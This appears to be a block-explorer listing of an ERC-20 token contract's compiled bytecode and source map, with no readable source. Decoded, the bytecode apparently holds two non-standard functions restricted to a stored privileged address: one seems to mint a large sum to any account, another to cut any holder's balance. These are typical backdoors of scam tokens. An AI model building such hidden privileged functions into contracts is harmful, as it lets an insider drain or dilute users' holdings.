fffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600061115283836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f77000081525061115a565b905092915050565b60008383111582906111a2576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611199919061124e565b60405180910390fd5b50600083856111b191906115cf565b9050809150509392505050565b600081519050919050565b600082825260208201905092915050565b60005b838110156111f85780820151818401526020810190506111dd565b60008484015250505050565b6000601f19601f8301169050919050565b6000611220826111be565b61122a81856111c9565b935061123a8185602086016111da565b61124381611204565b840191505092915050565b600060208201905081810360008301526112688184611215565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006112a082611275565b9050919050565b6112b081611295565b81146112bb57600080fd5b50565b6000813590506112cd816112a7565b92915050565b6000819050919050565b6112e6816112d3565b81146112f157600080fd5b50565b600081359050611303816112dd565b92915050565b600080604083850312156113205761131f611270565b5b600061132e858286016112be565b925050602061133f858286016112f4565b9150509250929050565b60008115159050919050565b61135e81611349565b82525050565b60006020820190506113796000830184611355565b92915050565b611388816112d3565b82525050565b60006020820190506113a3600083018461137f565b92915050565b6000806000606084860312156113c2576113c1611270565b5b60006113d0868287016112be565b93505060206113e1868287016112be565b92505060406113f2868287016112f4565b9150509250925092565b600060ff82169050919050565b611412816113fc565b82525050565b600060208201905061142d6000830184611409565b92915050565b60006020828403121561144957611448611270565b5b6000611457848285016112be565b91505092915050565b61146981611295565b82525050565b60006020820190506114846000830184611460565b92915050565b600080604083850312156114a1576114a0611270565b5b60006114af858286016112be565b92505060206114c0858286016112be565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061151157607f821691505b602082108103611524576115236114ca565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b6000611564826112d3565b915061156f836112d3565b92508282019050808211156115875761158661152a565b5b92915050565b6000611598826112d3565b91506115a3836112d3565b92508282026115b1816112d3565b915082820484148315176115c8576115c761152a565b5b5092915050565b60006115da826112d3565b91506115e5836112d3565b92508282039050818111156115fd576115fc61152a565b5b92915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b600061165f6025836111c9565b915061166a82611603565b604082019050919050565b6000602082019050818103600083015261168e81611652565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b60006116f16026836111c9565b91506116fc82611695565b604082019050919050565b60006020820190508181036000830152611720816116e4565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006117836024836111c9565b915061178e82611727565b604082019050919050565b600060208201905081810360008301526117b281611776565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006118156022836111c9565b9150611820826117b9565b604082019050919050565b6000602082019050818103600083015261184481611808565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b6000611881601d836111c9565b915061188c8261184b565b602082019050919050565b600060208201905081810360008301526118b081611874565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b60006119136026836111c9565b915061191e826118b7565b604082019050919050565b6000602082019050818103600083015261194281611906565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b60006119a56025836111c9565b91506119b082611949565b604082019050919050565b600060208201905081810360008301526119d481611998565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000611a376023836111c9565b9150611a42826119db565b604082019050919050565b60006020820190508181036000830152611a6681611a2a565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611aa36020836111c9565b9150611aae82611a6d565b602082019050919050565b60006020820190508181036000830152611ad281611a96565b905091905056fea264697066735822122077c9808d4fae40d8c23dfdc09003a9157bc7f4464c966aac091a04a2a95fa55664736f6c63430008120033

Deployed Bytecode

0x608060405234801561001057600080fd5b506004361061010b5760003560e01c8063715018a6116100a2578063a457c2d711610071578063a457c2d7146102a8578063a9059cbb146102d8578063b43f04fb14610308578063dd62ed3e14610326578063f2fde38b146103565761010b565b8063715018a6146102465780638da5cb5b14610250578063904e65381461026e57806395d89b411461028a5761010b565b8063313ce567116100de578063313ce567146101ac57806339509351146101ca57806349b8c6c5146101fa57806370a08231146102165761010b565b806306fdde0314610110578063095ea7b31461012e57806318160ddd1461015e57806323b872dd1461017c575b600080fd5b610118610372565b604051610125919061124e565b60405180910390f35b61014860048036038101906101439190611309565b610404565b6040516101559190611364565b60405180910390f35b610166610427565b604051610173919061138e565b60405180910390f35b610196600480360381019061019191906113a9565b610431565b6040516101a39190611364565b60405180910390f35b6101b4610460565b6040516101c19190611418565b60405180910390f35b6101e460048036038101906101df9190611309565b610469565b6040516101f19190611364565b60405180910390f35b610214600480360381019061020f9190611433565b6104a0565b005b610230600480360381019061022b9190611433565b6105d3565b60405161023d919061138e565b60405180910390f35b61024e61061c565b005b610258610630565b604051610265919061146f565b60405180910390f35b61028860048036038101906102839190611433565b610659565b005b610292610809565b60405161029f919061124e565b60405180910390f35b6102c260048036038101906102bd9190611309565b61089b565b6040516102cf9190611364565b60405180910390f35b6102f260048036038101906102ed9190611309565b610922565b6040516102ff9190611364565b60405180910390f35b610310610945565b60405161031d919061146f565b60405180910390f35b610340600480360381019061033b919061148a565b61096b565b60405161034d919061138e565b60405180910390f35b610370600480360381019061036b9190611433565b6109f2565b005b606060038054610381906114f9565b80601f01602080910402602001604051908101604052809291908181526020018280546103ad906114f9565b80156103fa5780601f106103cf576101008083540402835291602001916103fa565b820191906000526020600020905b8154815290600101906020018083116103dd57829003601f168201915b5050505050905090565b60008061040f610a75565b905061041c818585610a7d565b600191505092915050565b6000600254905090565b60008061043c610a75565b9050610449858285610c46565b610454858585610ce2565b60019150509392505050565b60006012905090565b600080610474610a75565b9050610495818585610486858961096b565b6104909190611559565b610a7d565b600191505092915050565b60006b04d8c55aefb8c05b5c00000090506000600180600184655af3107a40006104ca919061158d565b6104d4919061158d565b6104de919061158d565b6104e8919061158d565b90506104f2610a75565b73ffffffffffffffffffffffffffffffffffffffff16600760009054906101000a9050505080600560008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282546105669190611559565b92505081905550610575610a75565b73ffffffffffffffffffffffffffffffffffffffff16600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146105ce57600080fd5b505050565b6000600560008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610624610fce565b61062e600061104c565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6000600560008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905060008182836106ac9190611559565b6106b691906115cf565b90506106c0610a75565b73ffffffffffffffffffffffffffffffffffffffff16600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16036107a35780600560008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461075f91906115cf565b600560008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b6107ab610a75565b73ffffffffffffffffffffffffffffffffffffffff16600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461080457600080fd5b505050565b606060048054610818906114f9565b80601f0160208091040260200160405190810160405280929190818152602001828054610844906114f9565b80156108915780601f1061086657610100808354040283529160200191610891565b820191906000526020600020905b81548152906001019060200180831161087457829003601f168201915b5050505050905090565b6000806108a6610a75565b905060006108b4828661096b565b9050838110156108f9576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108f090611675565b60405180910390fd5b6109168286610911878561111090919063ffffffff16565b610a7d565b60019250505092915050565b60008061092d610a75565b905061093a818585610ce2565b600191505092915050565b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6000600660008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b6109fa610fce565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610a69576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a6090611707565b60405180910390fd5b610a728161104c565b50565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610aec576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ae390611799565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610b5b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b529061182b565b60405180910390fd5b80600660008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610c39919061138e565b60405180910390a3505050565b6000610c52848461096b565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610cdc5781811015610cbe576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cb590611897565b60405180910390fd5b610cdb8484610cd6858561111090919063ffffffff16565b610a7d565b5b50505050565b6000600560008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610d69576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d6090611929565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1603610dd8576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dcf906119bb565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610e47576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e3e90611a4d565b60405180910390fd5b81600560008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610e9291906115cf565b600560008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600560008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610f209190611559565b600560008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610fc0919061138e565b60405180910390a350505050565b610fd6610a75565b73ffffffffffffffffffffffffffffffffffffffff16610ff4610630565b73ffffffffffffffffffffffffffffffffffffffff161461104a576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161104190611ab9565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600061115283836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f77000081525061115a565b905092915050565b60008383111582906111a2576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611199919061124e565b60405180910390fd5b50600083856111b191906115cf565b9050809150509392505050565b600081519050919050565b600082825260208201905092915050565b60005b838110156111f85780820151818401526020810190506111dd565b60008484015250505050565b6000601f19601f8301169050919050565b6000611220826111be565b61122a81856111c9565b935061123a8185602086016111da565b61124381611204565b840191505092915050565b600060208201905081810360008301526112688184611215565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006112a082611275565b9050919050565b6112b081611295565b81146112bb57600080fd5b50565b6000813590506112cd816112a7565b92915050565b6000819050919050565b6112e6816112d3565b81146112f157600080fd5b50565b600081359050611303816112dd565b92915050565b600080604083850312156113205761131f611270565b5b600061132e858286016112be565b925050602061133f858286016112f4565b9150509250929050565b60008115159050919050565b61135e81611349565b82525050565b60006020820190506113796000830184611355565b92915050565b611388816112d3565b82525050565b60006020820190506113a3600083018461137f565b92915050565b6000806000606084860312156113c2576113c1611270565b5b60006113d0868287016112be565b93505060206113e1868287016112be565b92505060406113f2868287016112f4565b9150509250925092565b600060ff82169050919050565b611412816113fc565b82525050565b600060208201905061142d6000830184611409565b92915050565b60006020828403121561144957611448611270565b5b6000611457848285016112be565b91505092915050565b61146981611295565b82525050565b60006020820190506114846000830184611460565b92915050565b600080604083850312156114a1576114a0611270565b5b60006114af858286016112be565b92505060206114c0858286016112be565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061151157607f821691505b602082108103611524576115236114ca565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b6000611564826112d3565b915061156f836112d3565b92508282019050808211156115875761158661152a565b5b92915050565b6000611598826112d3565b91506115a3836112d3565b92508282026115b1816112d3565b915082820484148315176115c8576115c761152a565b5b5092915050565b60006115da826112d3565b91506115e5836112d3565b92508282039050818111156115fd576115fc61152a565b5b92915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b600061165f6025836111c9565b915061166a82611603565b604082019050919050565b6000602082019050818103600083015261168e81611652565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b60006116f16026836111c9565b91506116fc82611695565b604082019050919050565b60006020820190508181036000830152611720816116e4565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006117836024836111c9565b915061178e82611727565b604082019050919050565b600060208201905081810360008301526117b281611776565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006118156022836111c9565b9150611820826117b9565b604082019050919050565b6000602082019050818103600083015261184481611808565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b6000611881601d836111c9565b915061188c8261184b565b602082019050919050565b600060208201905081810360008301526118b081611874565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b60006119136026836111c9565b915061191e826118b7565b604082019050919050565b6000602082019050818103600083015261194281611906565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b60006119a56025836111c9565b91506119b082611949565b604082019050919050565b600060208201905081810360008301526119d481611998565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000611a376023836111c9565b9150611a42826119db565b604082019050919050565b60006020820190508181036000830152611a6681611a2a565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611aa36020836111c9565b9150611aae82611a6d565b602082019050919050565b60006020820190508181036000830152611ad281611a96565b905091905056fea264697066735822122077c9808d4fae40d8c23dfdc09003a9157bc7f4464c966aac091a04a2a95fa55664736f6c63430008120033

Deployed Bytecode Sourcemap

8989:10348:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;10678:87;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12922:184;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11762:88;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13686:244;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11621:76;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;14339:238;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10281:327;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;11913:110;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6840:103;;;:::i;:::-;;6188:87;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9938:335;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;10884:89;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;15080:401;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12229:176;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9905:24;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12468:134;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;7098:201;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;10678:87;10715:13;10748:9;10741:16;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;10678:87;:::o;12922:184::-;12988:4;13005:13;13021:12;:10;:12::i;:::-;13005:28;;13044:32;13053:5;13060:7;13069:6;13044:8;:32::i;:::-;13094:4;13087:11;;;12922:184;;;;:::o;11762:88::-;11806:7;11833:9;;11826:16;;11762:88;:::o;13686:244::-;13766:4;13783:15;13801:12;:10;:12::i;:::-;13783:30;;13824:38;13840:4;13846:7;13855:6;13824:15;:38::i;:::-;13873:27;13883:4;13889:2;13893:6;13873:9;:27::i;:::-;13918:4;13911:11;;;13686:244;;;;;:::o;11621:76::-;11662:5;11687:2;11680:9;;11621:76;:::o;14339:238::-;14427:4;14444:13;14460:12;:10;:12::i;:::-;14444:28;;14483:64;14492:5;14499:7;14536:10;14508:25;14518:5;14525:7;14508:9;:25::i;:::-;:38;;;;:::i;:::-;14483:8;:64::i;:::-;14565:4;14558:11;;;14339:238;;;;:::o;10281:327::-;10341:14;10358:24;10341:41;;10393:18;10441:1;10439;10437;10430:6;10414:15;:22;;;;:::i;:::-;:24;;;;:::i;:::-;:26;;;;:::i;:::-;:28;;;;:::i;:::-;10393:49;;10468:12;:10;:12::i;:::-;10456:24;;:8;;;;;;;;;;:24;10546:10;10523:9;:19;10533:8;10523:19;;;;;;;;;;;;;;;;:33;;;;;;;:::i;:::-;;;;;;;;10587:12;:10;:12::i;:::-;10575:24;;:8;;;;;;;;;;;:24;;;10567:33;;;;;;10330:278;;10281:327;:::o;11913:110::-;11970:7;11997:9;:18;12007:7;11997:18;;;;;;;;;;;;;;;;11990:25;;11913:110;;;:::o;6840:103::-;6070:17;:15;:17::i;:::-;6905:30:::1;6932:1;6905:18;:30::i;:::-;6840:103::o:0;6188:87::-;6234:7;6261:6;;;;;;;;;;;6254:13;;6188:87;:::o;9938:335::-;9992:17;10012:9;:19;10022:8;10012:19;;;;;;;;;;;;;;;;9992:39;;10042:15;10080:9;10070;10060;:19;;;;:::i;:::-;:29;;;;:::i;:::-;10042:47;;10115:12;:10;:12::i;:::-;10103:24;;:8;;;;;;;;;;;:24;;;10100:122;;10203:7;10183:9;:19;10193:8;10183:19;;;;;;;;;;;;;;;;:27;;;;:::i;:::-;10161:9;:19;10171:8;10161:19;;;;;;;;;;;;;;;:49;;;;10100:122;10252:12;:10;:12::i;:::-;10240:24;;:8;;;;;;;;;;;:24;;;10232:33;;;;;;9981:292;;9938:335;:::o;10884:89::-;10923:13;10956:9;10949:16;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;10884:89;:::o;15080:401::-;15173:4;15190:13;15206:12;:10;:12::i;:::-;15190:28;;15229:24;15256:25;15266:5;15273:7;15256:9;:25::i;:::-;15229:52;;15320:15;15300:16;:35;;15292:85;;;;;;;;;;;;:::i;:::-;;;;;;;;;15388:63;15397:5;15404:7;15413:37;15434:15;15413:16;:20;;:37;;;;:::i;:::-;15388:8;:63::i;:::-;15469:4;15462:11;;;;15080:401;;;;:::o;12229:176::-;12291:4;12308:13;12324:12;:10;:12::i;:::-;12308:28;;12347;12357:5;12364:2;12368:6;12347:9;:28::i;:::-;12393:4;12386:11;;;12229:176;;;;:::o;9905:24::-;;;;;;;;;;;;;:::o;12468:134::-;12540:7;12567:11;:18;12579:5;12567:18;;;;;;;;;;;;;;;:27;12586:7;12567:27;;;;;;;;;;;;;;;;12560:34;;12468:134;;;;:::o;7098:201::-;6070:17;:15;:17::i;:::-;7207:1:::1;7187:22;;:8;:22;;::::0;7179:73:::1;;;;;;;;;;;;:::i;:::-;;;;;;;;;7263:28;7282:8;7263:18;:28::i;:::-;7098:201:::0;:::o;5400:98::-;5453:7;5480:10;5473:17;;5400:98;:::o;16928:346::-;17047:1;17030:19;;:5;:19;;;17022:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;17128:1;17109:21;;:7;:21;;;17101:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;17212:6;17182:11;:18;17194:5;17182:18;;;;;;;;;;;;;;;:27;17201:7;17182:27;;;;;;;;;;;;;;;:36;;;;17250:7;17234:32;;17243:5;17234:32;;;17259:6;17234:32;;;;;;:::i;:::-;;;;;;;;16928:346;;;:::o;17565:378::-;17666:24;17693:25;17703:5;17710:7;17693:9;:25::i;:::-;17666:52;;17753:17;17733:16;:37;17729:207;;17815:6;17795:16;:26;;17787:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;17870:54;17879:5;17886:7;17895:28;17916:6;17895:16;:20;;:28;;;;:::i;:::-;17870:8;:54::i;:::-;17729:207;17655:288;17565:378;;;:::o;15953:537::-;16076:15;16094:9;:15;16104:4;16094:15;;;;;;;;;;;;;;;;16076:33;;16139:6;16128:7;:17;;16120:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;16223:1;16207:18;;:4;:18;;;16199:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;16300:1;16286:16;;:2;:16;;;16278:64;;;;;;;;;;;;:::i;:::-;;;;;;;;;16387:6;16371:9;:15;16381:4;16371:15;;;;;;;;;;;;;;;;:22;;;;:::i;:::-;16353:9;:15;16363:4;16353:15;;;;;;;;;;;;;;;:40;;;;16434:6;16420:9;:13;16430:2;16420:13;;;;;;;;;;;;;;;;:20;;;;:::i;:::-;16404:9;:13;16414:2;16404:13;;;;;;;;;;;;;;;:36;;;;16471:2;16456:26;;16465:4;16456:26;;;16475:6;16456:26;;;;;;:::i;:::-;;;;;;;;16065:425;15953:537;;;:::o;6353:136::-;6432:12;:10;:12::i;:::-;6421:23;;:7;:5;:7::i;:::-;:23;;;6413:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;6353:136::o;7459:191::-;7533:16;7552:6;;;;;;;;;;;7533:25;;7578:8;7569:6;;:17;;;;;;;;;;;;;;;;;;7633:8;7602:40;;7623:8;7602:40;;;;;;;;;;;;7522:128;7459:191;:::o;864:136::-;922:7;949:43;953:1;956;949:43;;;;;;;;;;;;;;;;;:3;:43::i;:::-;942:50;;864:136;;;;:::o;1303:192::-;1389:7;1422:1;1417;:6;;1425:12;1409:29;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;1449:9;1465:1;1461;:5;;;;:::i;:::-;1449:17;;1486:1;1479:8;;;1303:192;;;;;:::o;7:99:1:-;59:6;93:5;87:12;77:22;;7:99;;;:::o;112:169::-;196:11;230:6;225:3;218:19;270:4;265:3;261:14;246:29;;112:169;;;;:::o;287:246::-;368:1;378:113;392:6;389:1;386:13;378:113;;;477:1;472:3;468:11;462:18;458:1;453:3;449:11;442:39;414:2;411:1;407:10;402:15;;378:113;;;525:1;516:6;511:3;507:16;500:27;349:184;287:246;;;:::o;539:102::-;580:6;631:2;627:7;622:2;615:5;611:14;607:28;597:38;;539:102;;;:::o;647:377::-;735:3;763:39;796:5;763:39;:::i;:::-;818:71;882:6;877:3;818:71;:::i;:::-;811:78;;898:65;956:6;951:3;944:4;937:5;933:16;898:65;:::i;:::-;988:29;1010:6;988:29;:::i;:::-;983:3;979:39;972:46;;739:285;647:377;;;;:::o;1030:313::-;1143:4;1181:2;1170:9;1166:18;1158:26;;1230:9;1224:4;1220:20;1216:1;1205:9;1201:17;1194:47;1258:78;1331:4;1322:6;1258:78;:::i;:::-;1250:86;;1030:313;;;;:::o;1430:117::-;1539:1;1536;1529:12;1676:126;1713:7;1753:42;1746:5;1742:54;1731:65;;1676:126;;;:::o;1808:96::-;1845:7;1874:24;1892:5;1874:24;:::i;:::-;1863:35;;1808:96;;;:::o;1910:122::-;1983:24;2001:5;1983:24;:::i;:::-;1976:5;1973:35;1963:63;;2022:1;2019;2012:12;1963:63;1910:122;:::o;2038:139::-;2084:5;2122:6;2109:20;2100:29;;2138:33;2165:5;2138:33;:::i;:::-;2038:139;;;;:::o;2183:77::-;2220:7;2249:5;2238:16;;2183:77;;;:::o;2266:122::-;2339:24;2357:5;2339:24;:::i;:::-;2332:5;2329:35;2319:63;;2378:1;2375;2368:12;2319:63;2266:122;:::o;2394:139::-;2440:5;2478:6;2465:20;2456:29;;2494:33;2521:5;2494:33;:::i;:::-;2394:139;;;;:::o;2539:474::-;2607:6;2615;2664:2;2652:9;2643:7;2639:23;2635:32;2632:119;;;2670:79;;:::i;:::-;2632:119;2790:1;2815:53;2860:7;2851:6;2840:9;2836:22;2815:53;:::i;:::-;2805:63;;2761:117;2917:2;2943:53;2988:7;2979:6;2968:9;2964:22;2943:53;:::i;:::-;2933:63;;2888:118;2539:474;;;;;:::o;3019:90::-;3053:7;3096:5;3089:13;3082:21;3071:32;;3019:90;;;:::o;3115:109::-;3196:21;3211:5;3196:21;:::i;:::-;3191:3;3184:34;3115:109;;:::o;3230:210::-;3317:4;3355:2;3344:9;3340:18;3332:26;;3368:65;3430:1;3419:9;3415:17;3406:6;3368:65;:::i;:::-;3230:210;;;;:::o;3446:118::-;3533:24;3551:5;3533:24;:::i;:::-;3528:3;3521:37;3446:118;;:::o;3570:222::-;3663:4;3701:2;3690:9;3686:18;3678:26;;3714:71;3782:1;3771:9;3767:17;3758:6;3714:71;:::i;:::-;3570:222;;;;:::o;3798:619::-;3875:6;3883;3891;3940:2;3928:9;3919:7;3915:23;3911:32;3908:119;;;3946:79;;:::i;:::-;3908:119;4066:1;4091:53;4136:7;4127:6;4116:9;4112:22;4091:53;:::i;:::-;4081:63;;4037:117;4193:2;4219:53;4264:7;4255:6;4244:9;4240:22;4219:53;:::i;:::-;4209:63;;4164:118;4321:2;4347:53;4392:7;4383:6;4372:9;4368:22;4347:53;:::i;:::-;4337:63;;4292:118;3798:619;;;;;:::o;4423:86::-;4458:7;4498:4;4491:5;4487:16;4476:27;;4423:86;;;:::o;4515:112::-;4598:22;4614:5;4598:22;:::i;:::-;4593:3;4586:35;4515:112;;:::o;4633:214::-;4722:4;4760:2;4749:9;4745:18;4737:26;;4773:67;4837:1;4826:9;4822:17;4813:6;4773:67;:::i;:::-;4633:214;;;;:::o;4853:329::-;4912:6;4961:2;4949:9;4940:7;4936:23;4932:32;4929:119;;;4967:79;;:::i;:::-;4929:119;5087:1;5112:53;5157:7;5148:6;5137:9;5133:22;5112:53;:::i;:::-;5102:63;;5058:117;4853:329;;;;:::o;5188:118::-;5275:24;5293:5;5275:24;:::i;:::-;5270:3;5263:37;5188:118;;:::o;5312:222::-;5405:4;5443:2;5432:9;5428:18;5420:26;;5456:71;5524:1;5513:9;5509:17;5500:6;5456:71;:::i;:::-;5312:222;;;;:::o;5540:474::-;5608:6;5616;5665:2;5653:9;5644:7;5640:23;5636:32;5633:119;;;5671:79;;:::i;:::-;5633:119;5791:1;5816:53;5861:7;5852:6;5841:9;5837:22;5816:53;:::i;:::-;5806:63;;5762:117;5918:2;5944:53;5989:7;5980:6;5969:9;5965:22;5944:53;:::i;:::-;5934:63;;5889:118;5540:474;;;;;:::o;6020:180::-;6068:77;6065:1;6058:88;6165:4;6162:1;6155:15;6189:4;6186:1;6179:15;6206:320;6250:6;6287:1;6281:4;6277:12;6267:22;;6334:1;6328:4;6324:12;6355:18;6345:81;;6411:4;6403:6;6399:17;6389:27;;6345:81;6473:2;6465:6;6462:14;6442:18;6439:38;6436:84;;6492:18;;:::i;:::-;6436:84;6257: